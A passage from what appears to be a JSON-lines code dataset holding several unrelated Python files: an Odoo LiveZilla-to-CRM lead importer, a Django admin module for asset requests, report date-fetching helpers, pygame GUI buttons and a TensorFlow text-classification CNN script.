chat['Language'], 'group': chat['Group']})\n\n return result\n\n def create_or_update_contacts(self, contacts, origin):\n \"\"\"\n Creates contacts or updates an existing contacts in odoo.\n :param contacts: List of contact information\n :param origin: Origin of the contact ('chat' | 'ticket')\n :return: True on success\n \"\"\"\n _logger.info('Creating or updating contacts from %i contacts', len(contacts))\n for contact in contacts:\n if not contact['phone'] and not contact['email']:\n _logger.warning('Skipping %s because it contains no email and phone', contact)\n continue\n\n name = contact['name']\n phone = contact['phone']\n email = contact['email']\n group_name = contact['group']\n origin_ref_str = 'pdf_crm_extensions.product_origin_' + origin\n if group_name:\n # product_origin_chat_vendas_lisboa\n origin_ref_str += '_' + group_name.lower().replace(' ', '_')\n origin_id = self.env.ref(origin_ref_str).id\n self.env['res.partner'].create_or_update(name, phone, email, origin_id)\n return True\n\n def fetch_tickets(self, timestamp_since):\n \"\"\"\n Retrieve tickets from livezilla\n :param timestamp_since: fetch tickets created afer this (unix timestamp)\n :return: list of tickets\n \"\"\"\n lz = self._get_livezilla_connector()\n datetime_since = datetime.datetime.fromtimestamp(float(timestamp_since), tz=pytz.utc)\n _logger.info('Retrieving tickets since %s', datetime_since.astimezone(pytz.timezone(tz)))\n tickets = lz.get_tickets(datetime_since, [livezilla.TicketStatus.OPEN, livezilla.TicketStatus.CLOSED, livezilla.TicketStatus.IN_PROGRESS])\n _logger.info('Retrieved %i tickets', len(tickets))\n\n for item in tickets:\n ticket = item['Ticket']\n ticket['TimestampCreated'] = ticket['Messages'][0]['TicketMessage']['Edited']\n\n return tickets\n\n def fetch_chats(self, timestamp_since):\n \"\"\"\n Retrieve chats from livezilla\n :param timestamp_since: fetch chats created 
afer this (unix timestamp)\n :return: list of chats\n \"\"\"\n lz = self._get_livezilla_connector()\n datetime_since = datetime.datetime.fromtimestamp(float(timestamp_since), tz=pytz.utc)\n _logger.info('Retrieving chats since %s', datetime_since.astimezone(pytz.timezone(tz)))\n chats = lz.get_chats(datetime_since)\n _logger.info('Retrieved %i chats', len(chats))\n\n # TODO: cache operator info\n for item in chats: # type: dict\n chat = item['Chat']\n chat_operator_id = chat['OperatorId']\n _logger.info('Retrieving details of operator %s', chat_operator_id)\n operator = livezilla.Operator(chat_operator_id, lz)\n try:\n operator.load()\n except livezilla.OperatorNotFoundError as ex:\n _logger.warn(ex)\n _logger.warn('Skipping chat %s', chat['ChatId'])\n continue\n _logger.info('Retrieved operator: %s', operator)\n chat['Operator'] = operator\n\n return chats\n\n def close_tickets(self, tickets):\n \"\"\"\n Close a list of tickets\n :param tickets: list of IDs of tickets to close\n :return: True on success\n \"\"\"\n lz = self._get_livezilla_connector()\n for item in tickets: # type: dict\n ticket_id = item['Ticket']['Id']\n _logger.info('Closing ticket %s', ticket_id)\n lz.close_ticket(ticket_id)\n\n return True\n\n @api.model\n def tickets_to_leads(self):\n \"\"\"\n Load livezilla tickets and create leads from them\n \"\"\"\n timestamp = self.env['ir.config_parameter'].get_param(LIVEZILLA_TICKET_PARAM_KEY)\n if not timestamp:\n self.env['ir.config_parameter'].set_param(LIVEZILLA_TICKET_PARAM_KEY, time.time())\n timestamp = time.time()\n\n tickets = self.fetch_tickets(timestamp)\n _logger.debug(tickets)\n if len(tickets) == 0:\n return\n\n contacts = pdf_external_leads_livezilla.extract_contacts_from_tickets(tickets)\n _logger.debug(contacts)\n self.create_or_update_contacts(contacts, 'ticket')\n leads = pdf_external_leads_livezilla.extract_leads_from_tickets(tickets)\n _logger.debug(leads)\n\n for lead in leads: # type: dict\n if lead['contact_email'] is not None and lead['contact_email'].endswith('portadafrente.pt'):\n _logger.info('Skipping lead because it is an internal %s (%s)', 'ticket', lead['contact_email'])\n continue\n\n subject = lead.get('name', '')\n description = lead.get('description', '')\n contact_name = lead.get('contact_name', None)\n contact_phone = lead.get('contact_phone', None)\n contact_email = lead.get('contact_email', None)\n salesperson_email = lead.get('operator', None)\n salesteam_name = lead.get('group', None)\n product_reference = lead.get('product_code', None)\n\n origin_ref = self.env.ref(_LEAD_ORIGIN_TICKET_REF)\n\n sales_user_ids = []\n if salesperson_email:\n sales_users = self.env['res.users'].search([('login', '=', salesperson_email)])\n if len(sales_users) == 1:\n sales_user_ids = sales_users.ids\n\n salesteam_id = None\n if salesteam_name:\n salesteam_search_result = self.env['crm.case.section'].search([('name', 'ilike', salesteam_name), ('parent_id', '=', False)])\n if len(salesteam_search_result) == 1:\n salesteam_id = salesteam_search_result[0].id\n\n product_id = None\n if product_reference:\n product_search_result = self.env['product.product'].from_internal_code(product_reference)\n if len(product_search_result) == 1:\n product_id = product_search_result.id\n\n self.env['crm.lead'].create_lead(\n subject,\n origin_ref.id,\n description,\n contact_name=contact_name,\n contact_phone=contact_phone,\n contact_email=contact_email,\n product_id=product_id,\n sales_user_ids=sales_user_ids,\n salesteam_id=salesteam_id\n )\n\n 
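# All processed tickets are closed in LiveZilla and the stored checkpoint is\n        # advanced to the newest ticket timestamp, so the next scheduled run only\n        # fetches tickets created after this batch.\n        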
self.close_tickets(tickets)\n new_checkpoint = max([float(t['Ticket']['TimestampCreated']) for t in tickets])\n self.env['ir.config_parameter'].set_param(LIVEZILLA_TICKET_PARAM_KEY, new_checkpoint)\n\n @api.model\n def chats_to_leads(self):\n \"\"\"\n Load livezilla chats and create leads from them\n \"\"\"\n timestamp = self.env['ir.config_parameter'].get_param(LIVEZILLA_CHAT_PARAM_KEY)\n if not timestamp:\n self.env['ir.config_parameter'].set_param(LIVEZILLA_CHAT_PARAM_KEY, time.time())\n timestamp = time.time()\n\n chats = self.fetch_chats(timestamp)\n _logger.debug(chats)\n if len(chats) == 0:\n return\n\n contacts = pdf_external_leads_livezilla.extract_contacts_from_chats(chats)\n _logger.debug(contacts)\n self.create_or_update_contacts(contacts, 'chat')\n leads = pdf_external_leads_livezilla.extract_leads_from_chats(chats)\n _logger.debug(leads)\n\n for lead in leads: # type: dict\n if lead['contact_email'] is not None and lead['contact_email'].endswith('portadafrente.pt'):\n _logger.info('Skipping lead because it is an internal %s (%s)', 'chat', lead['contact_email'])\n continue\n\n subject = lead.get('name', '')\n description = lead.get('description', '')\n contact_name = lead.get('contact_name', None)\n contact_phone = lead.get('contact_phone', None)\n contact_email = lead.get('contact_email', None)\n salesperson_email = lead.get('operator', None)\n salesteam_name = lead.get('group', None)\n product_reference = lead.get('product_code', None)\n\n origin_ref = self.env.ref(_LEAD_ORIGIN_CHAT_REF)\n\n sales_user_ids = []\n if salesperson_email:\n sales_users = self.env['res.users'].search([('login', '=', salesperson_email)])\n if len(sales_users) == 1:\n sales_user_ids = sales_users.ids\n\n salesteam_id = None\n if salesteam_name:\n salesteam_search_result = self.env['crm.case.section'].search([('name', 'ilike', salesteam_name), ('parent_id', '=', False)])\n if len(salesteam_search_result) == 1:\n salesteam_id = salesteam_search_result[0].id\n\n product_id = None\n if product_reference:\n product_search_result = self.env['product.product'].from_internal_code(product_reference)\n if len(product_search_result) == 1:\n product_id = product_search_result.id\n\n self.env['crm.lead'].create_lead(\n subject,\n origin_ref.id,\n description,\n contact_name=contact_name,\n contact_phone=contact_phone,\n contact_email=contact_email,\n product_id=product_id,\n sales_user_ids=sales_user_ids,\n salesteam_id=salesteam_id\n )\n\n new_checkpoint = max([int(c['Chat']['TimeStart']) for c in chats])\n self.env['ir.config_parameter'].set_param(LIVEZILLA_CHAT_PARAM_KEY, new_checkpoint)\n","sub_path":"pdf_external_leads/models/pdf_external_leads_livezilla.py","file_name":"pdf_external_leads_livezilla.py","file_ext":"py","file_size_in_byte":16312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"384645081","text":"from django.contrib import admin\r\nfrom Apps.Asset.Request.models import *\r\nfrom django.forms.models import BaseInlineFormSet\r\nfrom django.contrib.auth.models import Group\r\nfrom Apps.Distribution.master_sales.models import *\r\n\r\n#class Choice_service_admin(admin.ModelAdmin):\r\n#\tlist_display = ['service']\r\n#\tsearch_fields = ['service']\r\n\t\r\n#admin.site.register(Choice_service, Choice_service_admin)\r\n\r\nclass DataUserRequestInline(admin.StackedInline):\r\n\tmodel = Data_user_request\r\n\textra = 0\r\n\tverbose_name = \"Data Request\"\r\n\treadonly_fields = 
('header','asset','choice_service','date_used','answer_service','description','asset_reply',)\r\n\t\r\nclass Header_user_request_admin(admin.ModelAdmin):\r\n\tlist_display = ['no_reg','user','req_date','department_staff_aggreement']\r\n\tsearch_fields = ['no_reg','department']\r\n\tinlines = [DataUserRequestInline,]\r\n\tdate_hierarchy = 'req_date'\r\n\t\r\n\tdef suit_row_attributes(self, obj, request):\r\n\t\tcss_class = {\r\n\t\t\tTrue:'success', False: 'error',}.get(obj.department_staff_aggreement)\r\n\t\tif css_class:\r\n\t\t\treturn {'class': css_class, 'data': obj.department_staff_aggreement}\r\n\t\r\n\tdef save_model(self, request, Header_user_request,form,change):\r\n\t\tdep = Group.objects.get(user=request.user)\r\n\t\tdep2 = StaffPerson.objects.get(user=request.user)\r\n\t\tif dep.name == 'unit':\r\n\t\t\tHeader_user_request.department = dep2.employee.department\r\n\t\tHeader_user_request.save()\r\n\t\r\n\tdef get_form(self, request, obj=None, **kwargs):\r\n\t\tdata = Group.objects.get(user=request.user)\r\n\t\tdata2 = StaffPerson.objects.get(user=request.user)\r\n\t\tform = super(Header_user_request_admin, self).get_form(request, obj, **kwargs)\r\n\t\tif data.name == 'unit':\r\n\t\t\ttry:\r\n\t\t\t\tx = getattr(obj,'department_staff_aggreement', False)\r\n\t\t\texcept: pass\r\n\t\t\tif x == False:\r\n\t\t\t\tform.base_fields['user'].queryset = form.base_fields['user'].queryset.filter(department=data2.employee.department)\r\n\t\t\telse : \r\n\t\t\t\treadonly_fields = ('user',)\r\n\t\telse: \r\n\t\t\treadonly_fields = ('no_reg','user','req_date','department_staff_aggreement',)\r\n\t\treturn form\r\n\r\n\t\r\n\tdef queryset(self, request, obj=None):\r\n\t\tuser = Group.objects.get(user=request.user)\r\n\t\tuser2 = StaffPerson.objects.get(user=request.user)\r\n\t\tdata = Ms_asset.objects.filter(usage_status = 1)\r\n\t\tif user.name=='unit':\r\n\t\t\treturn Header_user_request.objects.filter(department=user2.employee.department)\r\n\t\telse :\r\n\t\t\treturn Header_user_request.objects.all()\t\r\n\t\t\t\r\n\t\tif request.user.is_superuser:\r\n\t\t\treturn Header_user_request.objects.all()\r\n\t\r\n\tdef get_readonly_fields(self, request, obj=None):\r\n\t\tdata = Group.objects.get(user=request.user)\r\n\t\treadonly_fields = ()\r\n\t\tif data.name == 'unit':\r\n\t\t\treadonly_fields = ('department',)\r\n\t\t\tif getattr(obj, 'department_staff_aggreement', None) == True:\r\n\t\t\t\treadonly_fields = ('user','department','department_staff_aggreement',) \t\r\n\t\t\t\r\n\t\t\t\t\r\n\t\telif data.name == 'staff':\r\n\t\t\treadonly_fields += ('no_reg','user','department','department_staff_aggreement',)\r\n\t\t\r\n\t\tif request.user.is_superuser:\r\n\t\t\treadonly_fields = ()\r\n\t\treturn readonly_fields\r\n\t\r\nadmin.site.register(Header_user_request, Header_user_request_admin)\r\n\r\nclass Data_user_request_admin(admin.ModelAdmin):\r\n\tlist_display = ['ID','header','date_used', 'choice_service','answer_service']\r\n\tsave_on_top = True\r\n\tordering = ('-asset', )\r\n\tlist_filter = ['choice_service',]\r\n\t\r\n\tdef suit_row_attributes(self, obj, request):\r\n\t\tcss_class = {\r\n\t\t\t11:'success',2:'success',13:'success',4:'success',5:'success',6:'success',7:'error'}.get(obj.answer_service)\r\n\t\tif css_class:\r\n\t\t\treturn {'class': css_class, 'data': obj.answer_service}\r\n\t\r\n\tdef get_form(self, request, obj=None, **kwargs):\r\n\t\tdata = Group.objects.get(user=request.user)\r\n\t\tdata2 = StaffPerson.objects.get(user=request.user)\r\n\t\tform = 
super(Data_user_request_admin, self).get_form(request, obj, **kwargs)\r\n\t\tif data.name == 'unit':\r\n\t\t\txx = False\r\n\t\t\ttry:\r\n\t\t\t\tx = getattr(obj, 'header', None)\r\n\t\t\t\txx = x.department_staff_aggreement\r\n\t\t\texcept: pass\r\n\t\t\tif xx == False:\r\n\t\t\t\tform.base_fields['asset'].queryset = form.base_fields['asset'].queryset.filter(department=data2.employee.department)\r\n\t\t\t\tform.base_fields['asset'].queryset = form.base_fields['asset'].queryset.filter(usage_status=1)\r\n\t\t\t\tform.base_fields['header'].queryset = form.base_fields['header'].queryset.filter(department_staff_aggreement=False)\r\n\t\t\t\tform.base_fields['header'].queryset = form.base_fields['header'].queryset.filter(department=data2.employee.department)\r\n\t\t\t\tself.exclude = ['asset_reply']\r\n\t\t\telse :\r\n\t\t\t\tself.exclude = ['asset_reply','description',]\r\n\t\telse : \r\n\t\t\txx = False\r\n\t\t\ttry:\r\n\t\t\t\tx = getattr(obj, 'header', None)\r\n\t\t\t\txx = x.department_staff_aggreement\r\n\t\t\texcept: pass\r\n\t\t\tif xx == False:\r\n\t\t\t\tself.exclude = ['description',] \r\n\t\t\telse: self.exclude = ['asset_reply','description',] \r\n\t\treturn form\r\n\t\t\r\n\t\t\t\r\n\tdef get_readonly_fields(self, request, obj=None):\r\n\t\tdata = Group.objects.get(user=request.user)\r\n\t\treadonly_fields = ()\r\n\t\tif data.name == 'unit':\r\n\t\t\txx = False\r\n\t\t\ttry:\r\n\t\t\t\tx = getattr(obj, 'header', None)\r\n\t\t\t\txx = x.department_staff_aggreement\r\n\t\t\texcept: pass\r\n\t\t\tif xx == False:\r\n\t\t\t\treadonly_fields = ('answer_service','asset_replyx',)\r\n\t\t\telse: \r\n\t\t\t\treadonly_fields = ('header','asset','choice_service','date_used','answer_service','descriptionx','asset_replyx',)\r\n\t\t\t\r\n\t\telif data.name == 'staff':\r\n\t\t\txx = False\r\n\t\t\ttry:\r\n\t\t\t\tx = getattr(obj, 'header', None)\r\n\t\t\t\txx = x.department_staff_aggreement\r\n\t\t\texcept: pass\r\n\t\t\tif xx == False:\r\n\t\t\t\treadonly_fields += ('header','choice_service','descriptionx','asset','date_used',)\r\n\t\t\telse: \r\n\t\t\t\treadonly_fields += ('header','choice_service','descriptionx','asset','date_used','answer_service','asset_replyx',)\r\n\t\t\t\t\r\n\t\tif request.user.is_superuser:\r\n\t\t\treadonly_fields = ()\r\n\t\treturn readonly_fields\r\n\t\"\"\"\t\t\r\n\t\t\tif getattr(obj, 'header', None) != None:\r\n\t\t\t\treadonly_fields += ('header','choice_service','description','asset','date_used',)\r\n\t\t\"\"\"\t\r\n\t\t\r\n\t\r\n\tdef queryset(self, request, obj=None):\r\n\t\tuser = Group.objects.get(user=request.user)\r\n\t\tuser2 = StaffPerson.objects.get(user=request.user)\r\n\t\tdata = Ms_asset.objects.filter(usage_status = 1)\r\n\t\tif user.name=='unit':\r\n\t\t\treturn Data_user_request.objects.filter(header__department=user2.employee.department)\r\n\t\telif user.name=='staff' :\r\n\t\t\treturn Data_user_request.objects.all()\t\r\n\t\telif request.user.is_superuser:\r\n\t\t\treturn Data_user_request.objects.all()\r\n\t\r\nadmin.site.register(Data_user_request, Data_user_request_admin)\r\n\r\n","sub_path":"Apps/Asset/Request/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"426489027","text":"import models\nimport tasks\nimport sqlalchemy as alchemy\n\nfrom datetime import datetime, date, timedelta\nfrom typing import TypeVar, Generic, Dict, Optional\n\ndef sql_max(a: Optional[any], b: Optional[any]) -> Optional[any]:\n if a is 
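The admin classes above derive per-role behavior with `Group.objects.get(user=request.user)`, which raises `Group.DoesNotExist` or `MultipleObjectsReturned` whenever the user belongs to zero or several groups, and the bare `readonly_fields = (...)` assignments inside `get_form` are locals with no effect. Below is a hedged sketch of a safer shape for the same policy, centralized in `get_readonly_fields`; it keeps the record's own (misspelled) field name `department_staff_aggreement`, and the group names and fields would need adapting to the real models. It is a shape sketch, not a drop-in replacement.

```python
from django.contrib import admin


class HeaderUserRequestAdmin(admin.ModelAdmin):
    def get_readonly_fields(self, request, obj=None):
        # Superusers see everything editable.
        if request.user.is_superuser:
            return ()
        # Membership test instead of Group.objects.get(), so users in zero
        # or several groups do not raise.
        group_names = set(request.user.groups.values_list('name', flat=True))
        if 'unit' in group_names:
            # Once the department staff agreement is set, lock the header.
            if obj is not None and obj.department_staff_aggreement:
                return ('user', 'department', 'department_staff_aggreement')
            return ('department',)
        if 'staff' in group_names:
            return ('no_reg', 'user', 'department',
                    'department_staff_aggreement')
        return ()
```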
None:\n        return b\n    elif b is None:\n        return a\n    else:\n        return max(a, b)\n\ndef sql_min(a: Optional[any], b: Optional[any]) -> Optional[any]:\n    if a is None:\n        return b\n    elif b is None:\n        return a\n    else:\n        return min(a, b)\n\nT = TypeVar('T', bound=tasks.ReportTask)\nclass ReportDateFetcher(Generic[T]):\n    task: T\n\n    def __init__(self, task: T):\n        self.task = task\n\n    @property\n    def ripe_data_age(self) -> timedelta:\n        return timedelta(seconds=0)\n\n    @property\n    def report_increment(self) -> timedelta:\n        return timedelta(days=1)\n\n    @property\n    def report_interval(self) -> timedelta:\n        return timedelta(days=6)\n\n    @property\n    def max_ripe_date(self) -> datetime:\n        return self.clamped_date(models.TimeModel.shared.utc_now - self.ripe_data_age)\n\n    def clamped_date(self, date: datetime) -> datetime:\n        return datetime.combine(date, datetime.min.time())\n\n    def backfill_start_date(self, backfill_target_date: datetime, min_date_fetched: Optional[datetime]=None) -> datetime:\n        if min_date_fetched is None:\n            return self.clamped_date(backfill_target_date)\n        return max(backfill_target_date, self.clamped_date(min_date_fetched) - self.report_increment - self.report_interval)\n    \n    def backfill_end_date(self, backfill_target_date: datetime, min_date_fetched: Optional[datetime]=None) -> datetime:\n        if min_date_fetched is None:\n            return min(self.clamped_date(backfill_target_date) + self.report_interval, self.max_ripe_date)\n        end_date = self.clamped_date(min_date_fetched) - self.report_increment\n        return backfill_target_date - timedelta(days=1) if end_date > self.max_ripe_date else end_date\n\n    def report_start_date(self, max_date_fetched: Optional[datetime]) -> datetime:\n        if max_date_fetched is None:\n            return self.max_ripe_date - self.report_interval\n        return self.clamped_date(max_date_fetched) + self.report_increment\n    \n    def report_end_date(self, max_date_fetched: Optional[datetime]) -> datetime:\n        if max_date_fetched is None:\n            return self.max_ripe_date\n        return min(self.clamped_date(max_date_fetched) + self.report_increment + self.report_interval, self.max_ripe_date)\n\n    def handle_report_table_does_not_exist(self):\n        backfill_target = models.TimeModel.shared.backfill_target_date\n        if backfill_target is None:\n            self.task.report_start_date = self.report_start_date(max_date_fetched=None)\n            self.task.report_end_date = self.report_end_date(max_date_fetched=None)\n        else:\n            self.task.report_start_date = self.backfill_start_date(backfill_target_date=backfill_target)\n            self.task.report_end_date = self.backfill_end_date(backfill_target_date=backfill_target)\n\n    def align_dates_to_increment(self):\n        increment = self.report_increment.total_seconds()\n        if increment == 0 or self.task.report_start_date > self.task.report_end_date:\n            return\n\n        interval = (self.task.report_end_date - self.task.report_start_date).total_seconds()\n        increments = int(interval / increment)\n        rounded_interval = timedelta(seconds=increments * increment)\n        \n        if models.TimeModel.shared.backfill_target_date is None:\n            self.task.report_end_date = self.task.report_start_date + rounded_interval\n        else:\n            self.task.report_start_date = self.task.report_end_date - rounded_interval\n\n    def override_dates_with_time_model(self):\n        if models.TimeModel.start_date is not None:\n            print(f'Overriding start date from time model:\\n{self.task.report_start_date} -> {models.TimeModel.start_date}')\n            self.task.report_start_date = models.TimeModel.start_date\n        if models.TimeModel.end_date is not None:\n            print(f'Overriding end date from time model:\\n{self.task.report_end_date} -> {models.TimeModel.end_date}')\n            self.task.report_end_date = models.TimeModel.end_date\n\n    def fetch(self):\n        self.task.run_date = models.TimeModel.shared.utc_now\n        if not self.task.report_table_exists:\n            self.handle_report_table_does_not_exist()\n            self.override_dates_with_time_model()\n            return\n\n        backfill_target = models.TimeModel.shared.backfill_target_date\n\n        session = self.task.sql_layer.alchemy_session()\n        date_column = self.task.report_table_model.table.columns[self.task.report_table_model.date_column_name]\n        query = session.query(alchemy.func.max(date_column)) if backfill_target is None else session.query(alchemy.func.min(date_column))\n        query = self.task.filtered_alchemy_query_by_identifier_columns(query=query) \\\n            .filter(self.task.report_table_model.table.columns[self.task.report_table_model.crystallized_column_name] == True)\n        \n        max_or_min_date_result = query.one()[0]\n        if isinstance(max_or_min_date_result, date):\n            max_or_min_date_result = datetime.combine(max_or_min_date_result, datetime.min.time())\n\n        if backfill_target is None:\n            if self.task.last_run_history is not None and self.task.last_run_history.target_end_time is not None and self.task.last_run_history.status == 'completed':\n                max_or_min_date_result = sql_max(max_or_min_date_result, self.task.last_run_history.target_end_time)\n\n            self.task.report_start_date = self.report_start_date(max_date_fetched=max_or_min_date_result)\n            self.task.report_end_date = self.report_end_date(max_date_fetched=max_or_min_date_result)\n        else:\n            if self.task.last_run_history is not None and self.task.last_run_history.target_start_time is not None and self.task.last_run_history.status == 'completed':\n                max_or_min_date_result = sql_min(max_or_min_date_result, self.task.last_run_history.target_start_time)\n\n            self.task.report_start_date = self.backfill_start_date(\n                backfill_target_date=backfill_target,\n                min_date_fetched=max_or_min_date_result\n            )\n            self.task.report_end_date = self.backfill_end_date(\n                backfill_target_date=backfill_target,\n                min_date_fetched=max_or_min_date_result\n            )\n        \n        self.align_dates_to_increment()\n        self.override_dates_with_time_model()\n\nclass BaseReportDateFetcher(ReportDateFetcher[tasks.ReportTask]):\n    pass\n\nclass CurrentDateFetcher(BaseReportDateFetcher):\n    def fetch(self):\n        self.task.run_date = models.TimeModel.shared.utc_now\n        self.task.report_start_date = self.task.run_date\n        self.task.report_end_date = self.task.run_date\n\nU = TypeVar('U', bound=tasks.MutateReportTask)\nclass MutatorDateFetcher(Generic[U], ReportDateFetcher[U]):\n    @property\n    def ripe_data_age(self) -> timedelta:\n        return timedelta(days=0)\n\nclass BaseMutatorDateFetcher(MutatorDateFetcher[tasks.MutateReportTask]):\n    pass\n\nclass MaterializeDateFetcher(Generic[U], MutatorDateFetcher[U]):\n    @property\n    def report_increment(self) -> timedelta:\n        return timedelta(days=-3) if models.TimeModel.shared.backfill_target_date is not None else timedelta(days=-43) \n\n    @property\n    def report_interval(self) -> timedelta:\n        return timedelta(days=60)\n\n    def align_dates_to_increment(self):\n        pass\n\nclass BaseMaterializeDateFetcher(MaterializeDateFetcher[tasks.MutateReportTask]):\n    pass","sub_path":"fetching/fetch_date_base.py","file_name":"fetch_date_base.py","file_ext":"py","file_size_in_byte":7192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}{"seq_id":"225901348","text":"import pygame\nfrom pygame import Color\n\nfrom ml_tinkering.engine.constants import COLOR_RED, 
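With the `TypeVar` calls in the record above corrected, the bounded-TypeVar idiom looks like this in isolation: `TypeVar`'s first argument must be the variable's name as a string (the record originally passed a class), and `bound=` restricts it to subclasses of the given base. A self-contained toy version with generic names:

```python
from typing import Generic, TypeVar


class ReportTask:
    name = 'base'


class MutateReportTask(ReportTask):
    name = 'mutate'


# The string 'T' is the variable's name; bound= constrains accepted types.
T = TypeVar('T', bound=ReportTask)


class Fetcher(Generic[T]):
    def __init__(self, task: T) -> None:
        self.task = task


fetcher: Fetcher[MutateReportTask] = Fetcher(MutateReportTask())
print(fetcher.task.name)  # -> 'mutate'
```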
COLOR_GREEN\nfrom ml_tinkering.engine.engine_application import EngineApplication\nfrom ml_tinkering.engine.entitiy.renderable_entity import RenderableEntity\nfrom ml_tinkering.engine.entitiy.tickable_entity import TickableEntity\nfrom ml_tinkering.engine.physics.shape.aabb import AABB\nfrom ml_tinkering.engine.physics.shape.point_shape import PointShape\nfrom ml_tinkering.engine.physics.vec2 import Vec2\nfrom ml_tinkering.engine.graphics.renderer import Renderer\nfrom ml_tinkering.engine.graphics.texture import Texture\n\n\nclass TemplateButton(TickableEntity, RenderableEntity):\n def __init__(self, position: Vec2 = Vec2(), dimension: Vec2 = Vec2(1, 1), centered: bool = False,\n auto_deactivate: bool = False):\n super().__init__(position)\n self.centered = centered\n self.half_dimension = dimension.scaled(1/2)\n self.collision_shape = AABB(position, dimension.scaled(1/2)) if centered else AABB(position + self.half_dimension, self.half_dimension)\n self.dimension = dimension\n self.auto_deactivate = auto_deactivate\n self.active = False\n self.on_active = self.default_on_active\n\n def tick(self, application: EngineApplication, delta: float):\n self.collision_shape.update(\n self.position if self.centered else self.position + self.half_dimension, self.half_dimension)\n mouse_pos = application.mouse_pos\n if self.auto_deactivate and self.active:\n self.active = False\n if application.is_mouse_button_clicked(0) and PointShape(mouse_pos).is_colliding_with_aabb(\n self.collision_shape):\n self.active = not self.active\n if self.active:\n self.on_active()\n\n def default_on_active(self):\n pass\n\n def set_on_active(self, callback):\n self.on_active = callback\n\nclass TexturedButton(TemplateButton):\n def __init__(self, position: Vec2, dimension: Vec2, off_texture: Texture, on_texture: Texture,\n centered: bool = False, auto_deactivate: bool = False):\n super().__init__(position, dimension, centered, auto_deactivate)\n self.off_texture = off_texture\n self.on_texture = on_texture\n\n def render(self, renderer: Renderer):\n if self.active:\n renderer.draw_texture(self.on_texture, position=self.position, centered=self.centered)\n else:\n renderer.draw_texture(self.off_texture, position=self.position, centered=self.centered)\n\n\nclass ColoredButton(TemplateButton):\n\n def __init__(self, position: Vec2 = Vec2(), dimension: Vec2 = Vec2(1, 1), off_color: Color = Color(COLOR_RED),\n on_color: Color = Color(COLOR_GREEN), centered: bool = False, auto_deactivate: bool = False):\n super().__init__(position, dimension, centered, auto_deactivate)\n self.off_color = off_color\n self.on_color = on_color\n\n def render(self, renderer: Renderer):\n if self.active:\n renderer.draw_rectangle(position=self.position, dimension=self.dimension, centered=self.centered,\n color=self.on_color)\n else:\n renderer.draw_rectangle(position=self.position, dimension=self.dimension, centered=self.centered,\n color=self.off_color)\n","sub_path":"ml_tinkering/engine/gui/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"31431221","text":"from other.utils.utils import *\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\nx_train = np.load(os.path.join(dir_path, 'other', 'npy', 'x_train_word.npy'), allow_pickle=True)\nx_test = np.load(os.path.join(dir_path, 'other', 'npy', 'x_test_word.npy'), allow_pickle=True)\ny_train = np.load(os.path.join(dir_path, 'other', 'npy', 'y_train_word.npy'), 
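The buttons above delegate hit-testing to `PointShape.is_colliding_with_aabb`, whose implementation is not part of this record. The underlying center/half-extent test is simple; below is a standalone sketch using plain tuples (the engine's actual API may differ):

```python
# Point-in-AABB test: the AABB is given by its center and half-extents.
def point_in_aabb(point, center, half_dim):
    px, py = point
    cx, cy = center
    hx, hy = half_dim
    # Inside when the offset from the center is within the half-extent
    # on both axes.
    return abs(px - cx) <= hx and abs(py - cy) <= hy


# A 100x40 button whose top-left corner is at (10, 10):
center = (10 + 50, 10 + 20)
half_dim = (50, 20)
print(point_in_aabb((60, 30), center, half_dim))   # True: inside
print(point_in_aabb((200, 30), center, half_dim))  # False: right of it
```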
allow_pickle=True)\ny_test = np.load(os.path.join(dir_path, 'other', 'npy', 'y_test_word.npy'), allow_pickle=True)\n\n\nN_FILTERS = 10\nFILTER_SHAPE1 = [20, 20]\nFILTER_SHAPE2 = [20, 1]\nPOOLING_WINDOW = 4\nPOOLING_STRIDE = 2\n\n\ndef char_cnn_model(x, withDropout):\n\n word_vectors = tf.contrib.layers.embed_sequence(\n x, vocab_size=no_words, embed_dim=EMBEDDING_SIZE)\n \n input_layer = tf.reshape(word_vectors, [-1, MAX_DOCUMENT_LENGTH, EMBEDDING_SIZE, 1])\n \n with tf.variable_scope('CNN_Layer1'):\n conv1 = tf.layers.conv2d(\n input_layer,\n filters=N_FILTERS,\n kernel_size=FILTER_SHAPE1,\n padding='VALID',\n activation=tf.nn.relu)\n pool1 = tf.layers.max_pooling2d(\n conv1,\n pool_size=POOLING_WINDOW,\n strides=POOLING_STRIDE,\n padding='SAME')\n \n with tf.variable_scope('CNN_Layer2'):\n conv2 = tf.layers.conv2d(\n pool1,\n filters=N_FILTERS,\n kernel_size=FILTER_SHAPE2,\n padding='VALID',\n activation=tf.nn.relu)\n pool2 = tf.layers.max_pooling2d(\n conv2,\n pool_size=POOLING_WINDOW,\n strides=POOLING_STRIDE,\n padding='SAME')\n\n dim = pool2.get_shape()[1].value * pool2.get_shape()[2].value * pool2.get_shape()[3].value \n \n with tf.variable_scope('CNN_Flatten'):\n flatten = tf.reshape(pool2, [-1, dim])\n \n with tf.variable_scope('ANN'):\n W1 = tf.Variable(tf.truncated_normal([dim, MAX_LABEL], stddev=1.0/np.sqrt(dim)))\n b1 = tf.Variable(tf.zeros([MAX_LABEL]))\n logits = tf.matmul(flatten, W1) + b1\n if withDropout:\n logits = tf.layers.dropout(logits)\n\n return input_layer, input_layer, conv1, pool1, conv2, pool2, flatten, logits\n\n\ndef train(withDropout):\n\n global x_train, x_test, y_train, y_test, no_epochs\n\n # Create the model\n x = tf.placeholder(tf.int64, [None, MAX_DOCUMENT_LENGTH])\n y_ = tf.placeholder(tf.int64)\n\n inputs, input_layer, conv1, pool1, conv2, pool2, flatten, logits = char_cnn_model(x, withDropout)\n\n # Optimizer\n entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=tf.one_hot(y_, MAX_LABEL), logits=logits))\n train_op = tf.train.AdamOptimizer(lr).minimize(entropy)\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n sess.run(tf.local_variables_initializer())\n\n print('input: ', sess.run([tf.shape(inputs)], {x: x_train, y_: y_train}))\n print('input_layer: ', sess.run([tf.shape(input_layer)], {x: x_train, y_: y_train}))\n print('conv1: ', sess.run([tf.shape(conv1)], {x: 